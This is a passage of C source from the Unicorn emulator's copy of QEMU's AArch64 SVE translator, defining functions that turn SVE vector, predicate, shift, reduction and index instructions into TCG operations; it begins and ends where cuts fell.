TARGET_ARM_TRANSLATE_A64_H */

unicorn-2.1.1/qemu/target/arm/translate-sve.c

/* * AArch64 SVE translation * * Copyright (c) 2018 Linaro, Ltd * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "tcg/tcg-op.h" #include "tcg/tcg-op-gvec.h" #include "tcg/tcg-gvec-desc.h" #include "qemu/log.h" #include "arm_ldst.h" #include "translate.h" #include "internals.h" #include "exec/helper-proto.h" #include "exec/helper-gen.h" #include "translate-a64.h" #include "fpu/softfloat.h" typedef void GVecGen2sFn(TCGContext *, unsigned, uint32_t, uint32_t, TCGv_i64, uint32_t, uint32_t); typedef void gen_helper_gvec_flags_3(TCGContext *, TCGv_i32, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_i32); typedef void gen_helper_gvec_flags_4(TCGContext *, TCGv_i32, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_i32); typedef void gen_helper_gvec_mem(TCGContext *, TCGv_env, TCGv_ptr, TCGv_i64, TCGv_i32); typedef void gen_helper_gvec_mem_scatter(TCGContext *, TCGv_env, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_i64, TCGv_i32); /* * Helpers for extracting complex instruction fields. */ /* See e.g. ASR (immediate, predicated).
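 * The tsz field and the 3-bit immediate arrive concatenated as
 * x = tsz:imm3; the position of the most significant set bit of
 * tsz encodes the element size, and the remaining low bits encode
 * the shift. Worked example (illustrative): x = 20 (0b10100)
 * gives esz = 1 (halfwords), a left-shift of 20 - (8 << 1) = 4,
 * and a right-shift of (16 << 1) - 20 = 12.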
* Returns -1 for unallocated encoding; diagnose later. */ static int tszimm_esz(DisasContext *s, int x) { x >>= 3; /* discard imm3 */ return 31 - clz32(x); } static int tszimm_shr(DisasContext *s, int x) { return (16 << tszimm_esz(s, x)) - x; } /* See e.g. LSL (immediate, predicated). */ static int tszimm_shl(DisasContext *s, int x) { return x - (8 << tszimm_esz(s, x)); } static inline int plus1(DisasContext *s, int x) { return x + 1; } /* The SH bit is in bit 8. Extract the low 8 and shift. */ static inline int expand_imm_sh8s(DisasContext *s, int x) { return (int8_t)x << (x & 0x100 ? 8 : 0); } static inline int expand_imm_sh8u(DisasContext *s, int x) { return (uint8_t)x << (x & 0x100 ? 8 : 0); } /* Convert a 2-bit memory size (msz) to a 4-bit data type (dtype) * with unsigned data. C.f. SVE Memory Contiguous Load Group. */ static inline int msz_dtype(DisasContext *s, int msz) { static const uint8_t dtype[4] = { 0, 5, 10, 15 }; return dtype[msz]; } /* * Include the generated decoder. */ #include "decode-sve.inc.c" /* * Implement all of the translator functions referenced by the decoder. */ /* Return the offset into CPUARMState of the predicate vector register Pn. * Note for this purpose, FFR is P16. */ static inline int pred_full_reg_offset(DisasContext *s, int regno) { return offsetof(CPUARMState, vfp.pregs[regno]); } /* Return the byte size of the whole predicate register, VL / 64. */ static inline int pred_full_reg_size(DisasContext *s) { return s->sve_len >> 3; } /* Round up the size of a register to a size allowed by * the tcg vector infrastructure. Any operation which uses this * size may assume that the bits above pred_full_reg_size are zero, * and must leave them the same way. * * Note that this is not needed for the vector registers as they * are always properly sized for tcg vectors. */ static int size_for_gvec(int size) { if (size <= 8) { return 8; } else { return QEMU_ALIGN_UP(size, 16); } } static int pred_gvec_reg_size(DisasContext *s) { return size_for_gvec(pred_full_reg_size(s)); } /* Invoke a vector expander on two Zregs. */ static bool do_vector2_z(DisasContext *s, GVecGen2Fn *gvec_fn, int esz, int rd, int rn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); gvec_fn(tcg_ctx, esz, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), vsz, vsz); } return true; } /* Invoke a vector expander on three Zregs. */ static bool do_vector3_z(DisasContext *s, GVecGen3Fn *gvec_fn, int esz, int rd, int rn, int rm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); gvec_fn(tcg_ctx, esz, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), vec_full_reg_offset(s, rm), vsz, vsz); } return true; } /* Invoke a vector move on two Zregs. */ static bool do_mov_z(DisasContext *s, int rd, int rn) { return do_vector2_z(s, tcg_gen_gvec_mov, 0, rd, rn); } /* Initialize a Zreg with replications of a 64-bit immediate. */ static void do_dupi_z(DisasContext *s, int rd, uint64_t word) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_dup64i(tcg_ctx, vec_full_reg_offset(s, rd), vsz, vsz, word); } /* Invoke a vector expander on two Pregs.
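 * Note that predicate expanders use pred_gvec_reg_size(), which
 * rounds the predicate size up to 8 or a multiple of 16 bytes (see
 * size_for_gvec above); bits above pred_full_reg_size() are
 * guaranteed zero and must be left that way.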
*/ static bool do_vector2_p(DisasContext *s, GVecGen2Fn *gvec_fn, int esz, int rd, int rn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { unsigned psz = pred_gvec_reg_size(s); gvec_fn(tcg_ctx, esz, pred_full_reg_offset(s, rd), pred_full_reg_offset(s, rn), psz, psz); } return true; } /* Invoke a vector expander on three Pregs. */ static bool do_vector3_p(DisasContext *s, GVecGen3Fn *gvec_fn, int esz, int rd, int rn, int rm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { unsigned psz = pred_gvec_reg_size(s); gvec_fn(tcg_ctx, esz, pred_full_reg_offset(s, rd), pred_full_reg_offset(s, rn), pred_full_reg_offset(s, rm), psz, psz); } return true; } /* Invoke a vector operation on four Pregs. */ static bool do_vecop4_p(DisasContext *s, const GVecGen4 *gvec_op, int rd, int rn, int rm, int rg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { unsigned psz = pred_gvec_reg_size(s); tcg_gen_gvec_4(tcg_ctx, pred_full_reg_offset(s, rd), pred_full_reg_offset(s, rn), pred_full_reg_offset(s, rm), pred_full_reg_offset(s, rg), psz, psz, gvec_op); } return true; } /* Invoke a vector move on two Pregs. */ static bool do_mov_p(DisasContext *s, int rd, int rn) { return do_vector2_p(s, tcg_gen_gvec_mov, 0, rd, rn); } /* Set the cpu flags as per a return from an SVE helper. */ static void do_pred_flags(TCGContext *tcg_ctx, TCGv_i32 t) { tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_NF, t); tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_ZF, t, 2); tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_CF, t, 1); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_VF, 0); } /* Subroutines computing the ARM PredTest pseudofunction. */ static void do_predtest1(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 g) { TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); gen_helper_sve_predtest1(tcg_ctx, t, d, g); do_pred_flags(tcg_ctx, t); tcg_temp_free_i32(tcg_ctx, t); } static void do_predtest(DisasContext *s, int dofs, int gofs, int words) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr dptr = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr gptr = tcg_temp_new_ptr(tcg_ctx); TCGv_i32 t; tcg_gen_addi_ptr(tcg_ctx, dptr, tcg_ctx->cpu_env, dofs); tcg_gen_addi_ptr(tcg_ctx, gptr, tcg_ctx->cpu_env, gofs); t = tcg_const_i32(tcg_ctx, words); gen_helper_sve_predtest(tcg_ctx, t, dptr, gptr, t); tcg_temp_free_ptr(tcg_ctx, dptr); tcg_temp_free_ptr(tcg_ctx, gptr); do_pred_flags(tcg_ctx, t); tcg_temp_free_i32(tcg_ctx, t); } /* For each element size, the bits within a predicate word that are active.
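 * One predicate bit governs one byte of vector data, so MO_8 uses
 * every bit, MO_16 every second bit (0x5555...), MO_32 every
 * fourth (0x1111...), and MO_64 every eighth (0x0101...).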
*/ const uint64_t pred_esz_masks[4] = { 0xffffffffffffffffull, 0x5555555555555555ull, 0x1111111111111111ull, 0x0101010101010101ull }; /* *** SVE Logical - Unpredicated Group */ static bool trans_AND_zzz(DisasContext *s, arg_rrr_esz *a) { return do_vector3_z(s, tcg_gen_gvec_and, 0, a->rd, a->rn, a->rm); } static bool trans_ORR_zzz(DisasContext *s, arg_rrr_esz *a) { return do_vector3_z(s, tcg_gen_gvec_or, 0, a->rd, a->rn, a->rm); } static bool trans_EOR_zzz(DisasContext *s, arg_rrr_esz *a) { return do_vector3_z(s, tcg_gen_gvec_xor, 0, a->rd, a->rn, a->rm); } static bool trans_BIC_zzz(DisasContext *s, arg_rrr_esz *a) { return do_vector3_z(s, tcg_gen_gvec_andc, 0, a->rd, a->rn, a->rm); } /* *** SVE Integer Arithmetic - Unpredicated Group */ static bool trans_ADD_zzz(DisasContext *s, arg_rrr_esz *a) { return do_vector3_z(s, tcg_gen_gvec_add, a->esz, a->rd, a->rn, a->rm); } static bool trans_SUB_zzz(DisasContext *s, arg_rrr_esz *a) { return do_vector3_z(s, tcg_gen_gvec_sub, a->esz, a->rd, a->rn, a->rm); } static bool trans_SQADD_zzz(DisasContext *s, arg_rrr_esz *a) { return do_vector3_z(s, tcg_gen_gvec_ssadd, a->esz, a->rd, a->rn, a->rm); } static bool trans_SQSUB_zzz(DisasContext *s, arg_rrr_esz *a) { return do_vector3_z(s, tcg_gen_gvec_sssub, a->esz, a->rd, a->rn, a->rm); } static bool trans_UQADD_zzz(DisasContext *s, arg_rrr_esz *a) { return do_vector3_z(s, tcg_gen_gvec_usadd, a->esz, a->rd, a->rn, a->rm); } static bool trans_UQSUB_zzz(DisasContext *s, arg_rrr_esz *a) { return do_vector3_z(s, tcg_gen_gvec_ussub, a->esz, a->rd, a->rn, a->rm); } /* *** SVE Integer Arithmetic - Binary Predicated Group */ static bool do_zpzz_ool(DisasContext *s, arg_rprr_esz *a, gen_helper_gvec_4 *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned vsz = vec_full_reg_size(s); if (fn == NULL) { return false; } if (sve_access_check(s)) { tcg_gen_gvec_4_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), pred_full_reg_offset(s, a->pg), vsz, vsz, 0, fn); } return true; } /* Select active elements from Zn and inactive elements from Zm, * storing the result in Zd.
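 * That is, for each element i: Zd[i] = Pg[i] ? Zn[i] : Zm[i],
 * i.e. the SVE SEL operation (see trans_SEL_zpzz below).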
*/ static void do_sel_z(DisasContext *s, int rd, int rn, int rm, int pg, int esz) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_4 * const fns[4] = { gen_helper_sve_sel_zpzz_b, gen_helper_sve_sel_zpzz_h, gen_helper_sve_sel_zpzz_s, gen_helper_sve_sel_zpzz_d }; unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_4_ool(tcg_ctx, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), vec_full_reg_offset(s, rm), pred_full_reg_offset(s, pg), vsz, vsz, 0, fns[esz]); } #define DO_ZPZZ(NAME, name) \ static bool trans_##NAME##_zpzz(DisasContext *s, arg_rprr_esz *a) \ { \ static gen_helper_gvec_4 * const fns[4] = { \ gen_helper_sve_##name##_zpzz_b, gen_helper_sve_##name##_zpzz_h, \ gen_helper_sve_##name##_zpzz_s, gen_helper_sve_##name##_zpzz_d, \ }; \ return do_zpzz_ool(s, a, fns[a->esz]); \ } DO_ZPZZ(AND, and) DO_ZPZZ(EOR, eor) DO_ZPZZ(ORR, orr) DO_ZPZZ(BIC, bic) DO_ZPZZ(ADD, add) DO_ZPZZ(SUB, sub) DO_ZPZZ(SMAX, smax) DO_ZPZZ(UMAX, umax) DO_ZPZZ(SMIN, smin) DO_ZPZZ(UMIN, umin) DO_ZPZZ(SABD, sabd) DO_ZPZZ(UABD, uabd) DO_ZPZZ(MUL, mul) DO_ZPZZ(SMULH, smulh) DO_ZPZZ(UMULH, umulh) DO_ZPZZ(ASR, asr) DO_ZPZZ(LSR, lsr) DO_ZPZZ(LSL, lsl) static bool trans_SDIV_zpzz(DisasContext *s, arg_rprr_esz *a) { static gen_helper_gvec_4 * const fns[4] = { NULL, NULL, gen_helper_sve_sdiv_zpzz_s, gen_helper_sve_sdiv_zpzz_d }; return do_zpzz_ool(s, a, fns[a->esz]); } static bool trans_UDIV_zpzz(DisasContext *s, arg_rprr_esz *a) { static gen_helper_gvec_4 * const fns[4] = { NULL, NULL, gen_helper_sve_udiv_zpzz_s, gen_helper_sve_udiv_zpzz_d }; return do_zpzz_ool(s, a, fns[a->esz]); } static bool trans_SEL_zpzz(DisasContext *s, arg_rprr_esz *a) { if (sve_access_check(s)) { do_sel_z(s, a->rd, a->rn, a->rm, a->pg, a->esz); } return true; } #undef DO_ZPZZ /* *** SVE Integer Arithmetic - Unary Predicated Group */ static bool do_zpz_ool(DisasContext *s, arg_rpr_esz *a, gen_helper_gvec_3 *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (fn == NULL) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_3_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), pred_full_reg_offset(s, a->pg), vsz, vsz, 0, fn); } return true; } #define DO_ZPZ(NAME, name) \ static bool trans_##NAME(DisasContext *s, arg_rpr_esz *a) \ { \ static gen_helper_gvec_3 * const fns[4] = { \ gen_helper_sve_##name##_b, gen_helper_sve_##name##_h, \ gen_helper_sve_##name##_s, gen_helper_sve_##name##_d, \ }; \ return do_zpz_ool(s, a, fns[a->esz]); \ } DO_ZPZ(CLS, cls) DO_ZPZ(CLZ, clz) DO_ZPZ(CNT_zpz, cnt_zpz) DO_ZPZ(CNOT, cnot) DO_ZPZ(NOT_zpz, not_zpz) DO_ZPZ(ABS, abs) DO_ZPZ(NEG, neg) static bool trans_FABS(DisasContext *s, arg_rpr_esz *a) { static gen_helper_gvec_3 * const fns[4] = { NULL, gen_helper_sve_fabs_h, gen_helper_sve_fabs_s, gen_helper_sve_fabs_d }; return do_zpz_ool(s, a, fns[a->esz]); } static bool trans_FNEG(DisasContext *s, arg_rpr_esz *a) { static gen_helper_gvec_3 * const fns[4] = { NULL, gen_helper_sve_fneg_h, gen_helper_sve_fneg_s, gen_helper_sve_fneg_d }; return do_zpz_ool(s, a, fns[a->esz]); } static bool trans_SXTB(DisasContext *s, arg_rpr_esz *a) { static gen_helper_gvec_3 * const fns[4] = { NULL, gen_helper_sve_sxtb_h, gen_helper_sve_sxtb_s, gen_helper_sve_sxtb_d }; return do_zpz_ool(s, a, fns[a->esz]); } static bool trans_UXTB(DisasContext *s, arg_rpr_esz *a) { static gen_helper_gvec_3 * const fns[4] = { NULL, gen_helper_sve_uxtb_h, gen_helper_sve_uxtb_s, gen_helper_sve_uxtb_d }; return do_zpz_ool(s, a, fns[a->esz]); } static bool trans_SXTH(DisasContext *s, 
arg_rpr_esz *a) { static gen_helper_gvec_3 * const fns[4] = { NULL, NULL, gen_helper_sve_sxth_s, gen_helper_sve_sxth_d }; return do_zpz_ool(s, a, fns[a->esz]); } static bool trans_UXTH(DisasContext *s, arg_rpr_esz *a) { static gen_helper_gvec_3 * const fns[4] = { NULL, NULL, gen_helper_sve_uxth_s, gen_helper_sve_uxth_d }; return do_zpz_ool(s, a, fns[a->esz]); } static bool trans_SXTW(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ool(s, a, a->esz == 3 ? gen_helper_sve_sxtw_d : NULL); } static bool trans_UXTW(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ool(s, a, a->esz == 3 ? gen_helper_sve_uxtw_d : NULL); } #undef DO_ZPZ /* *** SVE Integer Reduction Group */ typedef void gen_helper_gvec_reduc(TCGContext *, TCGv_i64, TCGv_ptr, TCGv_ptr, TCGv_i32); static bool do_vpz_ool(DisasContext *s, arg_rpr_esz *a, gen_helper_gvec_reduc *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned vsz = vec_full_reg_size(s); TCGv_ptr t_zn, t_pg; TCGv_i32 desc; TCGv_i64 temp; if (fn == NULL) { return false; } if (!sve_access_check(s)) { return true; } desc = tcg_const_i32(tcg_ctx, simd_desc(vsz, vsz, 0)); temp = tcg_temp_new_i64(tcg_ctx); t_zn = tcg_temp_new_ptr(tcg_ctx); t_pg = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, t_zn, tcg_ctx->cpu_env, vec_full_reg_offset(s, a->rn)); tcg_gen_addi_ptr(tcg_ctx, t_pg, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->pg)); fn(tcg_ctx, temp, t_zn, t_pg, desc); tcg_temp_free_ptr(tcg_ctx, t_zn); tcg_temp_free_ptr(tcg_ctx, t_pg); tcg_temp_free_i32(tcg_ctx, desc); write_fp_dreg(s, a->rd, temp); tcg_temp_free_i64(tcg_ctx, temp); return true; } #define DO_VPZ(NAME, name) \ static bool trans_##NAME(DisasContext *s, arg_rpr_esz *a) \ { \ static gen_helper_gvec_reduc * const fns[4] = { \ gen_helper_sve_##name##_b, gen_helper_sve_##name##_h, \ gen_helper_sve_##name##_s, gen_helper_sve_##name##_d, \ }; \ return do_vpz_ool(s, a, fns[a->esz]); \ } DO_VPZ(ORV, orv) DO_VPZ(ANDV, andv) DO_VPZ(EORV, eorv) DO_VPZ(UADDV, uaddv) DO_VPZ(SMAXV, smaxv) DO_VPZ(UMAXV, umaxv) DO_VPZ(SMINV, sminv) DO_VPZ(UMINV, uminv) static bool trans_SADDV(DisasContext *s, arg_rpr_esz *a) { static gen_helper_gvec_reduc * const fns[4] = { gen_helper_sve_saddv_b, gen_helper_sve_saddv_h, gen_helper_sve_saddv_s, NULL }; return do_vpz_ool(s, a, fns[a->esz]); } #undef DO_VPZ /* *** SVE Shift by Immediate - Predicated Group */ /* Store zero into every active element of Zd. We will use this for two * and three-operand predicated instructions for which logic dictates a * zero result. */ static bool do_clr_zp(DisasContext *s, int rd, int pg, int esz) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_2 * const fns[4] = { gen_helper_sve_clr_b, gen_helper_sve_clr_h, gen_helper_sve_clr_s, gen_helper_sve_clr_d, }; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_2_ool(tcg_ctx, vec_full_reg_offset(s, rd), pred_full_reg_offset(s, pg), vsz, vsz, 0, fns[esz]); } return true; } /* Copy Zn into Zd, storing zeros into inactive elements. 
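 * This is the zeroing counterpart of do_sel_z above: Zd[i] = Pg[i] ? Zn[i] : 0.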
*/ static void do_movz_zpz(DisasContext *s, int rd, int rn, int pg, int esz) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_3 * const fns[4] = { gen_helper_sve_movz_b, gen_helper_sve_movz_h, gen_helper_sve_movz_s, gen_helper_sve_movz_d, }; unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_3_ool(tcg_ctx, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), pred_full_reg_offset(s, pg), vsz, vsz, 0, fns[esz]); } static bool do_zpzi_ool(DisasContext *s, arg_rpri_esz *a, gen_helper_gvec_3 *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_3_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), pred_full_reg_offset(s, a->pg), vsz, vsz, a->imm, fn); } return true; } static bool trans_ASR_zpzi(DisasContext *s, arg_rpri_esz *a) { static gen_helper_gvec_3 * const fns[4] = { gen_helper_sve_asr_zpzi_b, gen_helper_sve_asr_zpzi_h, gen_helper_sve_asr_zpzi_s, gen_helper_sve_asr_zpzi_d, }; if (a->esz < 0) { /* Invalid tsz encoding -- see tszimm_esz. */ return false; } /* Shift by element size is architecturally valid. For arithmetic right-shift, it's the same as by one less. */ a->imm = MIN(a->imm, (8 << a->esz) - 1); return do_zpzi_ool(s, a, fns[a->esz]); } static bool trans_LSR_zpzi(DisasContext *s, arg_rpri_esz *a) { static gen_helper_gvec_3 * const fns[4] = { gen_helper_sve_lsr_zpzi_b, gen_helper_sve_lsr_zpzi_h, gen_helper_sve_lsr_zpzi_s, gen_helper_sve_lsr_zpzi_d, }; if (a->esz < 0) { return false; } /* Shift by element size is architecturally valid. For logical shifts, it is a zeroing operation. */ if (a->imm >= (8 << a->esz)) { return do_clr_zp(s, a->rd, a->pg, a->esz); } else { return do_zpzi_ool(s, a, fns[a->esz]); } } static bool trans_LSL_zpzi(DisasContext *s, arg_rpri_esz *a) { static gen_helper_gvec_3 * const fns[4] = { gen_helper_sve_lsl_zpzi_b, gen_helper_sve_lsl_zpzi_h, gen_helper_sve_lsl_zpzi_s, gen_helper_sve_lsl_zpzi_d, }; if (a->esz < 0) { return false; } /* Shift by element size is architecturally valid. For logical shifts, it is a zeroing operation. */ if (a->imm >= (8 << a->esz)) { return do_clr_zp(s, a->rd, a->pg, a->esz); } else { return do_zpzi_ool(s, a, fns[a->esz]); } } static bool trans_ASRD(DisasContext *s, arg_rpri_esz *a) { static gen_helper_gvec_3 * const fns[4] = { gen_helper_sve_asrd_b, gen_helper_sve_asrd_h, gen_helper_sve_asrd_s, gen_helper_sve_asrd_d, }; if (a->esz < 0) { return false; } /* Shift by element size is architecturally valid. For arithmetic right shift for division, it is a zeroing operation. */ if (a->imm >= (8 << a->esz)) { return do_clr_zp(s, a->rd, a->pg, a->esz); } else { return do_zpzi_ool(s, a, fns[a->esz]); } } /* *** SVE Bitwise Shift - Predicated Group */ #define DO_ZPZW(NAME, name) \ static bool trans_##NAME##_zpzw(DisasContext *s, arg_rprr_esz *a) \ { \ static gen_helper_gvec_4 * const fns[3] = { \ gen_helper_sve_##name##_zpzw_b, gen_helper_sve_##name##_zpzw_h, \ gen_helper_sve_##name##_zpzw_s, \ }; \ if (a->esz < 0 || a->esz >= 3) { \ return false; \ } \ return do_zpzz_ool(s, a, fns[a->esz]); \ } DO_ZPZW(ASR, asr) DO_ZPZW(LSR, lsr) DO_ZPZW(LSL, lsl) #undef DO_ZPZW /* *** SVE Bitwise Shift - Unpredicated Group */ static bool do_shift_imm(DisasContext *s, arg_rri_esz *a, bool asr, void (*gvec_fn)(TCGContext *, unsigned, uint32_t, uint32_t, int64_t, uint32_t, uint32_t)) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->esz < 0) { /* Invalid tsz encoding -- see tszimm_esz. 
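 * (The decode leaves a->esz negative when the tsz field has no valid element size.)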
*/ return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); /* Shift by element size is architecturally valid. For arithmetic right-shift, it's the same as by one less. Otherwise it is a zeroing operation. */ if (a->imm >= 8 << a->esz) { if (asr) { a->imm = (8 << a->esz) - 1; } else { do_dupi_z(s, a->rd, 0); return true; } } gvec_fn(tcg_ctx, a->esz, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), a->imm, vsz, vsz); } return true; } static bool trans_ASR_zzi(DisasContext *s, arg_rri_esz *a) { return do_shift_imm(s, a, true, tcg_gen_gvec_sari); } static bool trans_LSR_zzi(DisasContext *s, arg_rri_esz *a) { return do_shift_imm(s, a, false, tcg_gen_gvec_shri); } static bool trans_LSL_zzi(DisasContext *s, arg_rri_esz *a) { return do_shift_imm(s, a, false, tcg_gen_gvec_shli); } static bool do_zzw_ool(DisasContext *s, arg_rrr_esz *a, gen_helper_gvec_3 *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (fn == NULL) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_3_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), vsz, vsz, 0, fn); } return true; } #define DO_ZZW(NAME, name) \ static bool trans_##NAME##_zzw(DisasContext *s, arg_rrr_esz *a) \ { \ static gen_helper_gvec_3 * const fns[4] = { \ gen_helper_sve_##name##_zzw_b, gen_helper_sve_##name##_zzw_h, \ gen_helper_sve_##name##_zzw_s, NULL \ }; \ return do_zzw_ool(s, a, fns[a->esz]); \ } DO_ZZW(ASR, asr) DO_ZZW(LSR, lsr) DO_ZZW(LSL, lsl) #undef DO_ZZW /* *** SVE Integer Multiply-Add Group */ static bool do_zpzzz_ool(DisasContext *s, arg_rprrr_esz *a, gen_helper_gvec_5 *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_5_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->ra), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), pred_full_reg_offset(s, a->pg), vsz, vsz, 0, fn); } return true; } #define DO_ZPZZZ(NAME, name) \ static bool trans_##NAME(DisasContext *s, arg_rprrr_esz *a) \ { \ static gen_helper_gvec_5 * const fns[4] = { \ gen_helper_sve_##name##_b, gen_helper_sve_##name##_h, \ gen_helper_sve_##name##_s, gen_helper_sve_##name##_d, \ }; \ return do_zpzzz_ool(s, a, fns[a->esz]); \ } DO_ZPZZZ(MLA, mla) DO_ZPZZZ(MLS, mls) #undef DO_ZPZZZ /* *** SVE Index Generation Group */ static void do_index(DisasContext *s, int esz, int rd, TCGv_i64 start, TCGv_i64 incr) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned vsz = vec_full_reg_size(s); TCGv_i32 desc = tcg_const_i32(tcg_ctx, simd_desc(vsz, vsz, 0)); TCGv_ptr t_zd = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, t_zd, tcg_ctx->cpu_env, vec_full_reg_offset(s, rd)); if (esz == 3) { gen_helper_sve_index_d(tcg_ctx, t_zd, start, incr, desc); } else { typedef void index_fn(TCGContext *, TCGv_ptr, TCGv_i32, TCGv_i32, TCGv_i32); static index_fn * const fns[3] = { gen_helper_sve_index_b, gen_helper_sve_index_h, gen_helper_sve_index_s, }; TCGv_i32 s32 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 i32 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, s32, start); tcg_gen_extrl_i64_i32(tcg_ctx, i32, incr); fns[esz](tcg_ctx, t_zd, s32, i32, desc); tcg_temp_free_i32(tcg_ctx, s32); tcg_temp_free_i32(tcg_ctx, i32); } tcg_temp_free_ptr(tcg_ctx, t_zd); tcg_temp_free_i32(tcg_ctx, desc); } static bool trans_INDEX_ii(DisasContext *s, arg_INDEX_ii *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { TCGv_i64 start = tcg_const_i64(tcg_ctx, a->imm1); TCGv_i64 incr 
= tcg_const_i64(tcg_ctx, a->imm2); do_index(s, a->esz, a->rd, start, incr); tcg_temp_free_i64(tcg_ctx, start); tcg_temp_free_i64(tcg_ctx, incr); } return true; } static bool trans_INDEX_ir(DisasContext *s, arg_INDEX_ir *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { TCGv_i64 start = tcg_const_i64(tcg_ctx, a->imm); TCGv_i64 incr = cpu_reg(s, a->rm); do_index(s, a->esz, a->rd, start, incr); tcg_temp_free_i64(tcg_ctx, start); } return true; } static bool trans_INDEX_ri(DisasContext *s, arg_INDEX_ri *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { TCGv_i64 start = cpu_reg(s, a->rn); TCGv_i64 incr = tcg_const_i64(tcg_ctx, a->imm); do_index(s, a->esz, a->rd, start, incr); tcg_temp_free_i64(tcg_ctx, incr); } return true; } static bool trans_INDEX_rr(DisasContext *s, arg_INDEX_rr *a) { if (sve_access_check(s)) { TCGv_i64 start = cpu_reg(s, a->rn); TCGv_i64 incr = cpu_reg(s, a->rm); do_index(s, a->esz, a->rd, start, incr); } return true; } /* *** SVE Stack Allocation Group */ static bool trans_ADDVL(DisasContext *s, arg_ADDVL *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { TCGv_i64 rd = cpu_reg_sp(s, a->rd); TCGv_i64 rn = cpu_reg_sp(s, a->rn); tcg_gen_addi_i64(tcg_ctx, rd, rn, a->imm * vec_full_reg_size(s)); } return true; } static bool trans_ADDPL(DisasContext *s, arg_ADDPL *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { TCGv_i64 rd = cpu_reg_sp(s, a->rd); TCGv_i64 rn = cpu_reg_sp(s, a->rn); tcg_gen_addi_i64(tcg_ctx, rd, rn, a->imm * pred_full_reg_size(s)); } return true; } static bool trans_RDVL(DisasContext *s, arg_RDVL *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { TCGv_i64 reg = cpu_reg(s, a->rd); tcg_gen_movi_i64(tcg_ctx, reg, a->imm * vec_full_reg_size(s)); } return true; } /* *** SVE Compute Vector Address Group */ static bool do_adr(DisasContext *s, arg_rrri *a, gen_helper_gvec_3 *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; 